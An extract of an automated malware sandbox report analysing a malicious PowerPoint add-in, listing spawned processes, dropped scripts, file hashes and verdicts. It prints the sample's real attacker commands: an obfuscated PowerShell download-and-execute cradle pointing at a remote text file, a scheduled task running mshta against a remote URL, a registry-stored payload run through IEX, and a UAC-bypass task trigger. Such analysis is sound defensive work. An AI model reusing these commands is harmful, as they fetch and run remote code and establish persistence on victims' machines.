Type Count
ID 10
File Name c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
Command Line"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $NOTHING = '(N`e`<^_^>t`.W`e'.Replace('<^_^>','w-Object Ne');$alosh='b... ...9a76492301c.usrfiles.com/ugd/35d427_aba34aefaf6944578eaddcbf518b0d51.txt'')';$YOUTUBE=I`E`X ($NOTHING,$alosh,$Dont -Join '')|I`E`X
Initial Working Directory C:\Windows\system32\
Monitor Start Time Start Time: 120148, Reason: Child Process
Unmonitor End Time End Time: 245801, Reason: Terminated
Monitor duration 125.65s
Return Code 0
PID 3928
Parent PID 3720
Bitness 32 Bit
C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
8.99 KB1adc32fffc15aee5a186eb7a6fd12a09c377c83665289589c94058df73a9de19
C:\Users\kEecfMwgj\AppData\Roaming\Microsoft\Windows\StartMenu\Programs\Startup\OneDrive.vbs
398 bytes61e40c1da7fd6964108819d35ac2641ec11f80d18f81b3fdc361612e6060bf8c
C:\Users\Public\alosh.ps1 12.46 KB049d229c448e844e1e6d7e30478d986f549c05471764db32ee349f494c3e1314
C:\Users\Public\run.ps1 559 bytes76e20cb044db745f7065bff4d5bb09c16d83ca1d17f615fa2e41e1d68f1cde17
C:\Users\Public\test.ps1 374 bytes7993a1c616e7d70074f3508ee8fb3d5b709f2a6894cd5a3fceff1630503a6513
C:\Users\Public\vb.vbs 495 bytes03b7e264915f482ca3499e842e8e71a2186c67f067adbd222059302da7b320f7
C:\Users\Public\Chrome.vbs 236 bytesfebb4719018181cf1dc5ed66812439e8c0a8b982a18c2e77354986804b71c1fa
System 71
Module 13
File 3092
Environment 161
Registry 136
- 58
Process 2
Keyboard 1
HTTP 2
HTTPS 1
DNS 3
X-Ray Vision for Malware - www.vmray.com 22 / 60
DYNAMIC ANALYSIS REPORT#2111629
Type Count
TCP 2
X-Ray Vision for Malware - www.vmray.com 23 / 60
DYNAMIC ANALYSIS REPORT#2111629
Process #11: schtasks.exe
Host Behavior
Type Count
ID 11
File Name c:\windows\syswow64\schtasks.exe
Command Line"C:\Windows\system32\schtasks.exe" /create /sc MINUTE /mo 80 /tn BlueStacksIUptad /F /tr "MsHtA http://1230948%[email protected]/p/9.html"
Initial Working Directory C:\Windows\system32\
Monitor Start Time Start Time: 168218, Reason: Child Process
Unmonitor End Time End Time: 170674, Reason: Terminated
Monitor duration 2.46s
Return Code 0
PID 3284
Parent PID 3808
Bitness 32 Bit
System 5
Module 9
COM 1
User 1
File 5
X-Ray Vision for Malware - www.vmray.com 24 / 60
DYNAMIC ANALYSIS REPORT#2111629
Process #12: taskeng.exe
ID 12
File Name c:\windows\system32\taskeng.exe
Command Line taskeng.exe {4AF814F3-B5F2-456B-9FF3-B4FF2E8485C0} S-1-5-21-4219442223-4223814209-3835049652-1000:Q9IATRKPRH\kEecfMwgj:Interactive:LUA[1]
Initial Working Directory C:\Windows\system32\
Monitor Start Time Start Time: 178825, Reason: Child Process
Unmonitor End Time End Time: 279253, Reason: Terminated by Timeout
Monitor duration 100.43s
Return Code Unknown
PID 2808
Parent PID 816
Bitness 64 Bit
X-Ray Vision for Malware - www.vmray.com 25 / 60
DYNAMIC ANALYSIS REPORT#2111629
Process #13: mshta.exe
Dropped Files (7)
File Name File Size SHA256 YARA Match
Host Behavior
Type Count
ID 13
File Name c:\windows\system32\mshta.exe
Command Line C:\Windows\system32\MsHtA.EXE http://1230948%[email protected]/p/9.html
Initial Working Directory C:\Windows\system32\
Monitor Start Time Start Time: 181216, Reason: Child Process
Unmonitor End Time End Time: 279253, Reason: Terminated by Timeout
Monitor duration 98.04s
Return Code Unknown
PID 3232
Parent PID 2808
Bitness 64 Bit
C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\TemporaryInternet Files\Content.IE5\MM5O9XQS\cookienotice[1].js
6.36 KB068ffe90977f2b5b2dc2ef18572166e85281bd0ecb31c4902464b23db54d2568
C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\TemporaryInternet Files\Content.IE5\PMMR5K9K\3822632116-css_bundle_v2[1].css
36.12 KB224d95cce08108610c46ef4134793dbdd619e43e90e9d9cf42716a08f45222f9
C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\TemporaryInternet Files\Content.IE5\MM5O9XQS\authorization[1].css
1 bytes01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b
- 95 bytes0fdcb4746995f0d5240e5ec11370cb950722a894f3cff4118aa68ccc92010edd
- 403 bytesecb30886406e3f776ff7bc3834de849944471e626ff148bed2fa389d02866044
- 86.98 KB329199d138adcc51a8bd2e72401c2e64be9a1e8f3009dc2dc3774ac9deb5f1b7
C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\TemporaryInternet Files\Content.IE5\MM5O9XQS\warning[1]
1.04 KB5f95eff2bcaaea82d0ae34a007de3595c0d830ac4810ea4854e6526e261108e9
System 101
Module 116
File 47
Environment 5
Registry 169
- 5
Keyboard 2
Mutex 1
Window 15
COM 40
- 3
Process 16
X-Ray Vision for Malware - www.vmray.com 26 / 60
DYNAMIC ANALYSIS REPORT#2111629
Network Behavior
Type Count
HTTP 2
HTTPS 2
TCP 3
X-Ray Vision for Malware - www.vmray.com 27 / 60
DYNAMIC ANALYSIS REPORT#2111629
Process #14: aspnet_compiler.exe
Injection Information (6)
Injection Type Source Process Source / Target TID Address / Name Size Success Count
Host Behavior
Type Count
ID 14
File Name c:\windows\microsoft.net\framework\v4.0.30319\aspnet_compiler.exe
Command Line #cmd
Initial Working Directory C:\Windows\system32\
Monitor Start Time Start Time: 186965, Reason: Child Process
Unmonitor End Time End Time: 272842, Reason: Terminated
Monitor duration 85.88s
Return Code 1073807364
PID 3584
Parent PID 3828
Bitness 32 Bit
Modify Memory
#6: c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
0xd08 0x400000(4194304) 0x200 1
Modify Memory
#6: c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
0xd08 0x402000(4202496) 0x35600 1
Modify Memory
#6: c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
0xd08 0x438000(4423680) 0x400 1
Modify Memory
#6: c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
0xd08 0x43a000(4431872) 0x200 1
Modify Memory
#6: c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
0xd08 0x7efde008(2130567176) 0x4 1
Modify Control Flow
#6: c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
0xd08 / 0xba0 - 1
Registry 60
Process 2
File 21
Module 70
Window 3
System 9
User 2
- 32
COM 33
Environment 5
X-Ray Vision for Malware - www.vmray.com 28 / 60
DYNAMIC ANALYSIS REPORT#2111629
Network Behavior
Type Count
HTTP 1
TCP 1
X-Ray Vision for Malware - www.vmray.com 29 / 60
DYNAMIC ANALYSIS REPORT#2111629
Process #15: aspnet_compiler.exe
ID 15
File Name c:\windows\microsoft.net\framework\v4.0.30319\aspnet_compiler.exe
Command Line #Powershell
Initial Working Directory C:\Windows\system32\
Monitor Start Time Start Time: 191130, Reason: Child Process
Unmonitor End Time End Time: 192683, Reason: Terminated
Monitor duration 1.55s
Return Code 4294967295
PID 2180
Parent PID 3828
Bitness 32 Bit
X-Ray Vision for Malware - www.vmray.com 30 / 60
DYNAMIC ANALYSIS REPORT#2111629
Process #16: aspnet_compiler.exe
Injection Information (6)
Injection Type Source Process Source / Target TID Address / Name Size Success Count
Host Behavior
Type Count
ID 16
File Name c:\windows\microsoft.net\framework\v4.0.30319\aspnet_compiler.exe
Command Line #Powershell
Initial Working Directory C:\Windows\system32\
Monitor Start Time Start Time: 191942, Reason: Child Process
Unmonitor End Time End Time: 199485, Reason: Terminated
Monitor duration 7.54s
Return Code 4294967295
PID 2188
Parent PID 3828
Bitness 32 Bit
Modify Memory
#6: c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
0xd08 0x400000(4194304) 0x200 1
Modify Memory
#6: c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
0xd08 0x402000(4202496) 0x35600 1
Modify Memory
#6: c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
0xd08 0x438000(4423680) 0x400 1
Modify Memory
#6: c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
0xd08 0x43a000(4431872) 0x200 1
Modify Memory
#6: c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
0xd08 0x7efde008(2130567176) 0x4 1
Modify Control Flow
#6: c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
0xd08 / 0x890 - 1
Registry 4
File 19
Module 4
Window 3
System 2
User 1
X-Ray Vision for Malware - www.vmray.com 31 / 60
DYNAMIC ANALYSIS REPORT#2111629
Process #18: wscript.exe
Host Behavior
Type Count
ID 18
File Name c:\windows\syswow64\wscript.exe
Command Line "C:\Windows\System32\WScript.exe" "C:\Users\Public\Chrome.vbs"
Initial Working Directory C:\Windows\system32\
Monitor Start Time Start Time: 208963, Reason: Child Process
Unmonitor End Time End Time: 211248, Reason: Terminated
Monitor duration 2.29s
Return Code 0
PID 2548
Parent PID 3928
Bitness 32 Bit
System 15
Module 22
Registry 27
- 1
Window 2
COM 5
File 4
Process 1
X-Ray Vision for Malware - www.vmray.com 32 / 60
DYNAMIC ANALYSIS REPORT#2111629
Process #19: powershell.exe
Host Behavior
Type Count
ID 19
File Name c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
Command Line "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nologo -ExecutionPolicy Unrestricted -File C:\Users\Public\run.ps1
Initial Working Directory C:\Windows\system32\
Monitor Start Time Start Time: 210020, Reason: Child Process
Unmonitor End Time End Time: 229936, Reason: Terminated
Monitor duration 19.92s
Return Code 0
PID 2660
Parent PID 2548
Bitness 32 Bit
Environment 27
File 160
System 15
Registry 82
Process 1
Module 5
- 22
- 1
X-Ray Vision for Malware - www.vmray.com 33 / 60
DYNAMIC ANALYSIS REPORT#2111629
Process #20: schtasks.exe
Host Behavior
Type Count
ID 20
File Name c:\windows\syswow64\schtasks.exe
Command Line "C:\Windows\system32\schtasks.exe" /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I
Initial Working Directory C:\Windows\system32\
Monitor Start Time Start Time: 226918, Reason: Child Process
Unmonitor End Time End Time: 229032, Reason: Terminated
Monitor duration 2.11s
Return Code 1
PID 3700
Parent PID 2660
Bitness 32 Bit
System 2
Module 7
COM 1
File 10
X-Ray Vision for Malware - www.vmray.com 34 / 60
DYNAMIC ANALYSIS REPORT#2111629
Process #21: powershell.exe
Host Behavior
Type Count
ID 21
File Name c:\windows\system32\windowspowershell\v1.0\powershell.exe
Command Line powershell.exe ((gp HKCU:\Software).cookerr)|IEX
Initial Working Directory C:\Windows\system32\
Monitor Start Time Start Time: 240103, Reason: Child Process
Unmonitor End Time End Time: 266115, Reason: Terminated
Monitor duration 26.01s
Return Code 1073807364
PID 3680
Parent PID 2812
Bitness 64 Bit
System 2
Module 1
File 1
Environment 4
X-Ray Vision for Malware - www.vmray.com 35 / 60
DYNAMIC ANALYSIS REPORT#2111629
Process #22: wscript.exe
Host Behavior
Type Count
ID 22
File Name c:\windows\syswow64\wscript.exe
Command Line "C:\Windows\System32\WScript.exe" "C:\Users\kEecfMwgj\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneDrive.vbs"
Initial Working Directory C:\Windows\system32\
Monitor Start Time Start Time: 243679, Reason: Child Process
Unmonitor End Time End Time: 245911, Reason: Terminated
Monitor duration 2.23s
Return Code 0
PID 3404
Parent PID 3928
Bitness 32 Bit
System 15
Module 22
Registry 27
- 1
Window 2
COM 5
File 4
Process 1
X-Ray Vision for Malware - www.vmray.com 36 / 60
DYNAMIC ANALYSIS REPORT#2111629
Process #23: powershell.exe
ID 23
File Name c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
Command Line "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nologo -ExecutionPolicy Unrestricted -File C:\Users\Public\msi.ps1
Initial Working Directory C:\Windows\system32\
Monitor Start Time Start Time: 244805, Reason: Child Process
Unmonitor End Time End Time: 250684, Reason: Terminated
Monitor duration 5.88s
Return Code 4294770688
PID 292
Parent PID 3404
Bitness 32 Bit
X-Ray Vision for Malware - www.vmray.com 37 / 60
DYNAMIC ANALYSIS REPORT#2111629
ARTIFACTS
File
SHA256 File Names Category File Size MIME Type Operations Verdict
dc82cadcaad72e4f7aa996a149126ecb15e652606e55a12efcb994a16f5159a9
c:\users\keecfmwgj\appdata\local\microsoft\windows\temporary internetfiles\content.ie5\rijuql1c\9_17[1].html
Downloaded File 32.91 KB text/html - MALICIOUS
329199d138adcc51a8bd2e72401c2e64be9a1e8f3009dc2dc3774ac9deb5f1b7
c:\users\keecfmwgj\appdata\local\microsoft\windows\temporary internetfiles\content.ie5\x9ohk109\9[1].html
Downloaded File 86.98 KB text/html - MALICIOUS
8e59758c7dba0ca744790644a23fa08c1e416e8f38ee221868b6560a2c915b51
C:\Users\kEecfMwgj\Desktop\9_pdf.ppam
Sample File 8.80 KB
application/vnd.openxmlformats-officedocument.presentationml.presentation
- MALICIOUS
6cc209598f4fa921559ad80d0d75cd214f4d021d39884b59811d69ac98125b2c
c:\users\keecfmwgj\appdata\local\microsoft\windows\temporary internetfiles\content.ie5\index.dat
Modified File 48.00 KB application/octet-stream - CLEAN
224d95cce08108610c46ef4134793dbdd619e43e90e9d9cf42716a08f45222f9
C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\Temporary InternetFiles\Content.IE5\PMMR5K9K\3822632116-css_bundle_v2[1].css, C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\Temporary InternetFiles\Content.IE5\MM5O9XQS\3822632116-css_bundle_v2[1].css
Downloaded File 36.12 KB text/plain Access, Read CLEAN
5993c37fe8dfca6e242e6e5b7c48ae99c9d41a8fe3d209dd38a0d161516b519a
C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\Temporary InternetFiles\Content.IE5\PMMR5K9K\3046902713-ieretrofit[1].js
Downloaded File 26.01 KB text/plain Access, Read CLEAN
01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b
C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\Temporary InternetFiles\Content.IE5\X9OHK109\authorization[1].css, C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\Temporary InternetFiles\Content.IE5\MM5O9XQS\authorization[1].css
Downloaded File 1 bytes application/octet-stream Access, Read CLEAN
9d358297f944faf6cfd24e3069ef42fa2aaef6fe243b61389a9a02c8d6de9a50
C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\Temporary InternetFiles\Content.IE5\X9OHK109\2583860411-widgets[1].js
Downloaded File 147.02 KB text/plain Access, Read CLEAN
068ffe90977f2b5b2dc2ef18572166e85281bd0ecb31c4902464b23db54d2568
C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\Temporary InternetFiles\Content.IE5\MM5O9XQS\cookienotice[1].js, C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\Temporary InternetFiles\Content.IE5\X9OHK109\cookienotice[1].js
Downloaded File 6.36 KB text/plain Access, Read CLEAN
0fc52ef116f03fd95f9857856f1e2cbdfa2cacc398e066db0d8d5481739bc2d7
C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\Temporary InternetFiles\Content.IE5\RIJUQL1C\281434096-static_pages[1].css
Downloaded File 3.72 KB text/plain Access, Read CLEAN
21cc4dc6c3c01b84c808004173f42e3ed1b4f09551a10d69b4cec7394a1590e6
C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\Temporary InternetFiles\Content.IE5\MM5O9XQS\3101730221-analytics_autotrack[1].js
Downloaded File 24.70 KB text/plain Access, Read CLEAN
3e6e1c58507746b01dd0f74cd9d40c885ffaea0cc025eb4f27c4c947916f2068
C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\Temporary InternetFiles\Content.IE5\PMMR5K9K\css[1].txt
Downloaded File 172 bytes text/plain Access, Read CLEAN
e61660c659c426e45bce2937dddb01af6b550502a2904546575c1ec2ba1121dd
C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\Temporary InternetFiles\Content.IE5\RIJUQL1C\analytics[1].js
Downloaded File 48.23 KB text/plain Access, Read CLEAN
X-Ray Vision for Malware - www.vmray.com 38 / 60
DYNAMIC ANALYSIS REPORT#2111629
SHA256 File Names Category File Size MIME Type Operations Verdict
8684a32d1a10d050a26fc33192edf427a5f0c6874c590a68d77ae6e0d186bd8a
C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\Temporary InternetFiles\Content.IE5\MM5O9XQS\maia[1].css
Downloaded File 42.48 KB text/plain Access, Read CLEAN
01e698231e9d93dceaa9a97f4e5cdbdbceefbea67d4e39acd0391e1cae00889b
C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\Temporary InternetFiles\Content.IE5\X9OHK109\mem5YaGs126MiZpBA-UN_r8OUuht[1].eot
Downloaded File 15.60 KBapplication/vnd.ms-fontobject
Access, Read CLEAN
22f8356c61b22b8a6506465087d48d831303e10c66bd3ced965f6a32a7302dde
C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\Temporary InternetFiles\Content.IE5\MM5O9XQS\kJEjBvgX7BgnkSrUwT8UnLVc38YydejYY-oE_LvN[1].eot
Downloaded File 152.93 KBapplication/vnd.ms-fontobject
Access, Read CLEAN
49d0d1473181447caad524188bfcb1344b20a4ffa42bb0b5ff7695e379ae3b79
C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\Temporary InternetFiles\Content.IE5\RIJUQL1C\css[1].txt
Downloaded File 402 bytes text/plain Access, Read CLEAN
f0da44c78fae13b0c7078626f17f4b5b60ef9e396d6cfc5cec5304d17c358d1a
C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\Temporary InternetFiles\Content.IE5\PMMR5K9K\pxiDypQkot1TnFhsFMOfGShVF9eK[1].eot
Downloaded File 27.95 KBapplication/vnd.ms-fontobject
Access, Read CLEAN
be869a73a160440e8bfc5c7d84a907febd61075d920d51c7d0097d7295c865cd
C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\Temporary InternetFiles\Content.IE5\RIJUQL1C\KFOmCnqEu92Fr1Mu4mxO[1].eot
Downloaded File 17.40 KBapplication/vnd.ms-fontobject
Access, Read CLEAN
1adc32fffc15aee5a186eb7a6fd12a09c377c83665289589c94058df73a9de19
C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Dropped File 8.99 KB application/octet-stream Access, Create, Write, Read CLEAN
61e40c1da7fd6964108819d35ac2641ec11f80d18f81b3fdc361612e6060bf8c
C:\Users\kEecfMwgj\AppData\Roaming\Microsoft\Windows\StartMenu\Programs\Startup\OneDrive.vbs,C:\Users\Public\OneDrive.vbs
Dropped File 398 bytes text/plainDelete, Write, Access,Create, Read
CLEAN
7990e703ae060c241eba6257d963af2ecf9c6f3fbdb57264c1d48dda8171e754
C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\Temporary InternetFiles\Content.IE5\MM5O9XQS\error[1], C:\Users\kEecfMwgj\AppD......t.IE5\RIJUQL1C\error[1], C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\Temporary InternetFiles\Content.IE5\X9OHK109\error[1]
Dropped File 3.17 KB text/html Access, Create, Write CLEAN
0b113b5594ea4cfeb6346d6f997c2dd8a1623037a855b9f896093ec1e1426811
c:\users\keecfmwgj\appdata\roaming\microsoft\windows\cookies\keecfmwgj@blogger[1].txt
Dropped File 97 bytes text/plain - CLEAN
bf0a747e7005ace88140897c4c166749eaffcd9f96286c431fa3409709a0b344
c:\users\keecfmwgj\appdata\roaming\microsoft\windows\cookies\keecfmwgj@blogger[2].txt
Dropped File 195 bytes text/plain - CLEAN
966240c0527b20e8e2553b7e5a68594ae69230aa00186f2c6c2c342405494837
C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\Temporary InternetFiles\Content.IE5\MM5O9XQS\error[1], C:\Users\kEecfMwgj\AppD......t.IE5\RIJUQL1C\error[1], C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\Temporary InternetFiles\Content.IE5\X9OHK109\error[1]
Dropped File 4.12 KB text/plain Access, Create, Write CLEAN
5f95eff2bcaaea82d0ae34a007de3595c0d830ac4810ea4854e6526e261108e9
C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\Temporary InternetFiles\Content.IE5\X9OHK109\warning[2], C:\Users\kEecfMwgj\Ap... ...5\MM5O9XQS\warning[1], C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\Temporary InternetFiles\Content.IE5\RIJUQL1C\warning[1]
Dropped File 1.04 KB image/gif Access, Create, Write CLEAN
049d229c448e844e1e6d7e30478d986f549c05471764db32ee349f494c3e1314
C:\Users\Public\alosh.ps1 Dropped File 12.46 KB text/plainDelete, Write, Access,Create, Read
CLEAN
X-Ray Vision for Malware - www.vmray.com 39 / 60
DYNAMIC ANALYSIS REPORT#2111629
SHA256 File Names Category File Size MIME Type Operations Verdict
76e20cb044db745f7065bff4d5bb09c16d83ca1d17f615fa2e41e1d68f1cde17
C:\Users\Public\run.ps1 Dropped File 559 bytes text/plainDelete, Write, Access,Create, Read
CLEAN
7993a1c616e7d70074f3508ee8fb3d5b709f2a6894cd5a3fceff1630503a6513
C:\Users\Public\test.ps1 Dropped File 374 bytes text/plainDelete, Write, Access,Create, Read
CLEAN
03b7e264915f482ca3499e842e8e71a2186c67f067adbd222059302da7b320f7
C:\Users\Public\vb.vbs Dropped File 495 bytes text/plainDelete, Write, Access,Create, Read
CLEAN
febb4719018181cf1dc5ed66812439e8c0a8b982a18c2e77354986804b71c1fa
C:\Users\Public\Chrome.vbs Dropped File 236 bytes text/plainDelete, Write, Access,Create, Read
CLEAN
2dc8d9262332f8848cc09468086d4c38fc1c5b9aac4619a42fc1c5634b979d1f
- Downloaded File 152 bytes text/html - CLEAN
ebd41040e4bb3ec742c9e381d31ef2a41a48b6685c96e7cef3c1df6cd4331c99
- Downloaded File 889 bytes application/octet-stream - CLEAN
167b9eed2d5009b99c0010be91da509c0cf52e388517053ac48cab5b4ba94a76
- Downloaded File 223 bytes text/html - CLEAN
58d607271f942eac12dcd237fd5333660a39517fab938ee95f0ce9234238360b
- Downloaded File 313 bytes text/html - CLEAN
dfe0f74a965b963675ff78e07d226005aa7b5a93d2e6e6df98b45bee442406d1
- Downloaded File 2.70 KB text/html - CLEAN
7474f8408ddf635ab3531f751ecc3f0dc474823d74baac91ee43e63c05ba0979
- Downloaded File 384 bytes text/plain - CLEAN
bd9df047d51943acc4bc6cf55d88edb5b6785a53337ee2a0f74dd521aedde87d
- Downloaded File 178 bytes text/html - CLEAN
25a34aed1f1f78b098376e9e7b6785fa7eaf3d9281192ff5e3915e6083ec8450
c:\users\keecfmwgj\appdata\local\microsoft\windows\temporary internetfiles\content.ie5\rijuql1c\blogin[1].g
Downloaded File 149.99 KB text/html - CLEAN
cbad27c35fbc84e2da4280476adeb197566db2750b8b4a79eb7e872db8d8acb7
c:\users\keecfmwgj\appdata\local\microsoft\windows\temporary internetfiles\content.ie5\mm5o9xqs\blogger-logotype-color-black-1x[1].png
Downloaded File 1.13 KB image/png - CLEAN
0fdcb4746995f0d5240e5ec11370cb950722a894f3cff4118aa68ccc92010edd
c:\users\keecfmwgj\appdata\local\microsoft\windows\temporary internetfiles\content.ie5\x9ohk109\body_gradient_tile_light[1].png, c:\users\keecfmwgj\appdata\local\microsoft\windows\temporary internetfiles\content.ie5\pmmr5k9k\body_gradient_tile_light[1].png
Downloaded File 95 bytes image/png - CLEAN
ecb30886406e3f776ff7bc3834de849944471e626ff148bed2fa389d02866044
c:\users\keecfmwgj\appdata\local\microsoft\windows\temporary internetfiles\content.ie5\pmmr5k9k\gradients_light[2].png, c:\users\keecfmwgj\appdata\local\microsoft\windows\temporary internetfiles\content.ie5\pmmr5k9k\gradients_light[1].png
Downloaded File 403 bytes image/png - CLEAN
e2cc2fa5b12df505e33dd1b9741d8a58696f0f06ea4b488a468590971f28c17b
- Downloaded File 534.72 KB text/plain - CLEAN
818fbd88425db09ce3b0f82df9795a1504b885a1680da06332b394e8a2a88e24
- Downloaded File 44.67 KB text/plain - CLEAN
387af277a3e8c36dcdb13e5688cdcbfb6b94fb325fbdccf2b326cf207f036cad
- Downloaded File 303 bytes text/html - CLEAN
X-Ray Vision for Malware - www.vmray.com 40 / 60
DYNAMIC ANALYSIS REPORT#2111629
Filename
File Name Category Operations Verdict
C:\Windows\SysWOW64\mshta.exe Accessed File Access CLEAN
Win.ini Accessed File Access, Read CLEAN
C:\Windows\SysWOW64\mshtml.dll Accessed File Access CLEAN
System Paging File Accessed File Access CLEAN
C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\TemporaryInternet Files\Content.IE5\MM5O9XQS\3822632116-css_bundle_v2[1].css
Downloaded File Access, Read CLEAN
C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\TemporaryInternet Files\Content.IE5\PMMR5K9K\3046902713-ieretrofit[1].js
Downloaded File Access, Read CLEAN
C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\TemporaryInternet Files\Content.IE5\X9OHK109\authorization[1].css
Downloaded File Access, Read CLEAN
C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\TemporaryInternet Files\Content.IE5\PMMR5K9K\css[1].txt
Downloaded File Access, Read CLEAN
C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\TemporaryInternet Files\Content.IE5\MM5O9XQS\maia[1].css
Downloaded File Access, Read CLEAN
C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\TemporaryInternet Files\Content.IE5\X9OHK109\mem5YaGs126MiZpBA-UN_r8OUuht[1].eot
Downloaded File Access, Read CLEAN
C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\TemporaryInternet Files\Content.IE5\RIJUQL1C\281434096-static_pages[1].css
Downloaded File Access, Read CLEAN
C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\TemporaryInternet Files\Content.IE5\X9OHK109\cookienotice[1].js
Downloaded File Access, Read CLEAN
C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\TemporaryInternet Files\Content.IE5\RIJUQL1C\error[1]
Dropped File Access, Create, Write CLEAN
C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\TemporaryInternet Files\Content.IE5\RIJUQL1C\analytics[1].js
Downloaded File Access, Read CLEAN
C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\TemporaryInternet Files\Content.IE5\X9OHK109\error[1]
Dropped File Access, Create, Write CLEAN
C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\TemporaryInternet Files\Content.IE5\RIJUQL1C\warning[1]
Dropped File Access, Create, Write CLEAN
C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\TemporaryInternet Files\Content.IE5\X9OHK109\2583860411-widgets[1].js
Downloaded File Access, Read CLEAN
C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\TemporaryInternet Files\Content.IE5\MM5O9XQS\error[1]
Dropped File Access, Create, Write CLEAN
C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\TemporaryInternetFiles\Content.IE5\MM5O9XQS\kJEjBvgX7BgnkSrUwT8UnLVc38YydejYY-oE_LvN[1].eot
Downloaded File Access, Read CLEAN
C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\TemporaryInternet Files\Content.IE5\MM5O9XQS\3101730221-analytics_autotrack[1].js
Downloaded File Access, Read CLEAN
C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\TemporaryInternet Files\Content.IE5\PMMR5K9K\error[1]
Dropped File Access, Create, Write CLEAN
C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\TemporaryInternet Files\Content.IE5\X9OHK109\warning[1]
Dropped File Access, Create, Write CLEAN
C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\TemporaryInternet Files\Content.IE5\RIJUQL1C\error[2]
Dropped File Access, Create, Write CLEAN
C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\TemporaryInternet Files\Content.IE5\PMMR5K9K\warning[1]
Dropped File Access, Create, Write CLEAN
C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\TemporaryInternet Files\Content.IE5\X9OHK109\error[2]
Dropped File Access, Create, Write CLEAN
C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\TemporaryInternet Files\Content.IE5\RIJUQL1C\css[1].txt
Downloaded File Access, Read CLEAN
C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\TemporaryInternetFiles\Content.IE5\PMMR5K9K\pxiDypQkot1TnFhsFMOfGShVF9eK[1].eot
Downloaded File Access, Read CLEAN
X-Ray Vision for Malware - www.vmray.com 41 / 60
DYNAMIC ANALYSIS REPORT#2111629
File Name Category Operations Verdict
C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\TemporaryInternetFiles\Content.IE5\RIJUQL1C\KFOmCnqEu92Fr1Mu4mxO[1].eot
Downloaded File Access, Read CLEAN
C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\TemporaryInternet Files\Content.IE5\X9OHK109\warning[2]
Dropped File Access, Create, Write CLEAN
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Accessed File Access CLEAN
C:\Windows\system32\%SystemRoot%\system32\WindowsPowerShell\v1.0\
Accessed File Access CLEAN
C:\Windows\system32 Accessed File Access CLEAN
C:\Windows\system32\schtasks.exe Accessed File Access CLEAN
C:\Windows Accessed File Access CLEAN
